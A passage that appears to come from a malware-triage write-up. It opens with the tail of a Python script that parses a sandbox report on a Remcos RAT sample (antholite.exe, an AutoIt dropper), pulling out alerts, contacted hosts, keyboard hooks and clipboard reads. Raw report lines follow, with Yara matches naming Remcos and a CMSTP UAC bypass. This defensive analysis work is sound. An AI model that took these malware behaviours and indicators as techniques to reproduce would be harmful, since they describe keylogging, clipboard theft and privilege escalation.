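    "Source: Yara matchFile source: C:\\ProgramData\\remcos\\logs.dat, type: DROPPED",
]


def host_of(url):
    """Hostname of a URL string exactly as found; adjacent-memory residue ("json.gpK") stays attached."""
    try:
        return urlsplit(url).hostname or ""
    except ValueError:
        return ""


def triage(lines):
    r = {
        "alerts": [],            # (sid, severity, msg, dst_ip, dst_port)
        "dns": set(),            # names resolved during the run
        "http": [],              # (method, path, host)
        "memory_hosts": set(),   # hosts from strings in process memory / unpacked code
        "artifact_hosts": set(), # hosts from strings in dropped temp files (*.dr): usually cache noise
        "hooks": [],             # (function id, hook type) for every SetWindowsHookEx call site
        "clipboard_read": [],    # function ids that open the clipboard and call GetClipboardData
        "dropped": [],           # files flagged by a Yara rule
        "nirsoft": False,        # embedded NirSoft recovery-tool strings present
    }
    for raw in lines:
        line = raw.strip()
        if m := RE_SURICATA.search(line):
            r["alerts"].append((int(m.group(1)), int(m.group(2)), m.group(3), m.group(6), int(m.group(7))))
        elif m := RE_HTTP.search(line):
            r["http"].append((m.group(1), m.group(2), m.group(3)))
        elif m := RE_DNS.search(line):
            r["dns"].add(m.group(1))
        elif m := RE_STRING.search(line):
            source, url = m.group(1), m.group(2)
            if "nirsoft.net" in url:
                r["nirsoft"] = True
            if host := host_of(url):
                # ".dr" is the report's suffix for files dropped during the run (assumption: treat as noise).
                r["artifact_hosts" if source.endswith(".dr") else "memory_hosts"].add(host)
        elif m := RE_CODEFN.search(line):
            fn_id = m.group(1)
            tokens = [t for t in re.split(r"[ ,]+", m.group(2)) if t]
            for i, tok in enumerate(tokens):
                if tok in HOOK_APIS and i + 1 < len(tokens):
                    try:
                        hook_id = int(tokens[i + 1], 16)  # idHook argument, printed as hex
                    except ValueError:
                        continue
                    r["hooks"].append((fn_id, HOOK_TYPES.get(hook_id, "WH_%d" % hook_id)))
            if "OpenClipboard" in tokens and "GetClipboardData" in tokens:
                r["clipboard_read"].append(fn_id)
        elif m := RE_DROPPED.search(line):
            r["dropped"].append(m.group(1))
    # A host seen in memory is only confirmed when the run actually resolved or requested it.
    seen_on_wire = r["dns"] | {h for _, _, h in r["http"]}
    r["network_confirmed"] = r["memory_hosts"] & seen_on_wire
    r["keyboard_hook_ll"] = any(t == "WH_KEYBOARD_LL" for _, t in r["hooks"])
    return r


if __name__ == "__main__":
    result = triage(REPORT_LINES)
    for key in ("alerts", "network_confirmed", "hooks", "clipboard_read", "dropped", "artifact_hosts"):
        print(key, "=", result[key])
```

Run as-is the script prints the alert tuple, geoplugin.net as the only network-confirmed host from memory, the WH_KEYBOARD_LL hook at 2_2_0040A2F3, the clipboard-reading function 2_2_004168FC, the dropped logs.dat, and the two DigiCert/Office hosts parked in the artifact tier. Feeding it the full page instead of the sample is a matter of reading the lines from a file; the tiering is what keeps the 80-odd bhvA838.tmp.3.dr URLs out of a block list.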

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0041CA73 SystemParametersInfoW,2_2_0041CA73

                  System Summary

                  barindex
                  Source: 2.2.antholite.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 2.2.antholite.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 2.2.antholite.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 7.2.antholite.exe.3c00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 7.2.antholite.exe.3c00000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 7.2.antholite.exe.3c00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 7.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 7.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
Source: 7.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: 7.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants | Author: unknown
Source: 7.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
Source: 2.2.antholite.exe.34e0000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: 2.2.antholite.exe.34e0000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants | Author: unknown
Source: 2.2.antholite.exe.34e0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
Source: 7.2.antholite.exe.3c00000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: 7.2.antholite.exe.3c00000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants | Author: unknown
Source: 7.2.antholite.exe.3c00000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
Source: 2.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: 2.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants | Author: unknown
Source: 2.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
Source: 2.2.antholite.exe.34e0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: 2.2.antholite.exe.34e0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants | Author: unknown
Source: 2.2.antholite.exe.34e0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
Source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants | Author: unknown
Source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
Source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants | Author: unknown
Source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
Source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants | Author: unknown
Source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
Source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants | Author: unknown
Source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
Source: Process Memory Space: antholite.exe PID: 6364, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: Process Memory Space: antholite.exe PID: 6444, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: Rgh99876k7e.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Rgh99876k7e.exe, 00000000.00000003.2101223371.0000000004301000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_67d66b9e-9
                  Source: Rgh99876k7e.exe, 00000000.00000003.2101223371.0000000004301000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_0fcfa98c-a
Source: Rgh99876k7e.exe, 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_d9e182d9-c
                  Source: Rgh99876k7e.exe, 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_6d89a1b8-b
Source: antholite.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: antholite.exe, 00000002.00000002.4550042362.0000000000952000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_3971682b-8
                  Source: antholite.exe, 00000002.00000002.4550042362.0000000000952000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_706a17db-c
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: This is a third-party compiled AutoIt script. | 3_2_00892A32
Source: antholite.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: antholite.exe, 00000003.00000002.2160714628.0000000000952000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_f1b58c9b-b
                  Source: antholite.exe, 00000003.00000002.2160714628.0000000000952000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_03a45a4d-d
Source: antholite.exe, 00000004.00000000.2143092752.0000000000952000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_6243c1c7-a
                  Source: antholite.exe, 00000004.00000000.2143092752.0000000000952000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e1314386-2
Source: antholite.exe, 00000005.00000002.2146925436.0000000000952000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_4644178f-1
                  Source: antholite.exe, 00000005.00000002.2146925436.0000000000952000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_09e3f308-c
Source: antholite.exe, 00000007.00000002.2233000415.0000000000952000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_55cbad4b-8
                  Source: antholite.exe, 00000007.00000002.2233000415.0000000000952000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_29ec75e4-7
Source: Rgh99876k7e.exe | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_6ecdb55a-1
                  Source: Rgh99876k7e.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a8045d7e-c
Source: antholite.exe.0.dr | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_826fa99c-5
                  Source: antholite.exe.0.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSam